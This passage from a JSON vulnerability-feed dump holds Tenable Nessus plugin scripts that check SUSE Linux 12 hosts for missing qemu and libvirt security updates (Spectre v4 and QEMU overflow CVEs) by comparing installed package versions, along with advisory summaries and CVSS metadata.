It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-iscsi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-iscsi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:qemu-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-block-rbd-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-block-rbd-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-x86-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-x86-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"s390x\", reference:\"qemu-s390-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"s390x\", reference:\"qemu-s390-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-block-curl-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-block-curl-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-block-iscsi-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-block-iscsi-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", 
sp:\"3\", reference:\"qemu-block-ssh-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-block-ssh-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-debugsource-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-guest-agent-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-guest-agent-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-lang-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-tools-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-tools-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-kvm-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-block-curl-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-block-curl-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-debugsource-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-kvm-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-tools-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-tools-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-x86-2.9.1-6.19.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n 
else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:21:52", "bulletinFamily": "scanner", "description": "This update for libvirt fixes the following issues :\n\nCVE-2018-3639: cpu: add support for ", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-1614-2.NASL", "href": "https://www.tenable.com/plugins/nessus/118261", "published": "2018-10-22T00:00:00", "title": "SUSE SLES12 Security Update : libvirt (SUSE-SU-2018:1614-2) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1614-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118261);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2018-3639\");\n\n script_name(english:\"SUSE SLES12 Security Update : libvirt (SUSE-SU-2018:1614-2) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libvirt fixes the following issues :\n\nCVE-2018-3639: cpu: add support for 'ssbd' and 'virt-ssbd' CPUID\nfeature bits pass through (bsc#1092885)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3639/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181614-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1cd73c90\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2018-1100=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-config-network\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-config-nwfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-interface\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-interface-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-libxl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-libxl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-lxc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-lxc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-network-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-nodedev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-nodedev-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-nwfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-nwfilter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-qemu-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-secret\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-secret-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-storage\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-storage-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-hooks\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-lxc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-lock-sanlock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-lock-sanlock-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-nss-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-client-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-client-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-config-network-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-config-nwfilter-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-interface-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-interface-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-libxl-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-libxl-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-lxc-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-lxc-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-network-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", 
reference:\"libvirt-daemon-driver-network-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-nodedev-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-nodedev-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-nwfilter-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-nwfilter-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-qemu-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-qemu-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-secret-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-secret-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-storage-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-storage-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-hooks-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-lxc-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-qemu-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-xen-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-debugsource-2.0.0-27.42.1\")) 
flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-doc-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-lock-sanlock-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-lock-sanlock-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-nss-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-nss-debuginfo-2.0.0-27.42.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvirt\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-03T12:23:33", "bulletinFamily": "scanner", "description": "This update for qemu fixes the following security issues :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could\nhave been exploited by sending a crafted QMP command (including\nguest-file-read with a large count value) to the agent via the\nlistening socket causing DoS (bsc#1098735)\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming\nfragmented datagrams (bsc#1096223)\n\nWith this release the mitigations for Spectre v4 are moved to the\npatches from upstream (CVE-2018-3639, bsc#1092885).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-2973-2.NASL", "href": "https://www.tenable.com/plugins/nessus/118297", "published": "2018-10-22T00:00:00", "title": "SUSE SLES12 Security Update : qemu (SUSE-SU-2018:2973-2) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2973-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118297);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2018-11806\", \"CVE-2018-12617\", \"CVE-2018-3639\");\n\n script_name(english:\"SUSE SLES12 Security Update : qemu (SUSE-SU-2018:2973-2) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for qemu fixes the following security issues :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could\nhave been exploited by sending a crafted QMP command (including\nguest-file-read with a large count value) to the agent via the\nlistening socket causing DoS (bsc#1098735)\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming\nfragmented datagrams (bsc#1096223)\n\nWith this release the mitigations for Spectre v4 are moved the the\npatches from upstream (CVE-2018-3639, bsc#1092885).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1098735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11806/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12617/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3639/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182973-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8d9e92b7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2018-2116=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu\");\n 
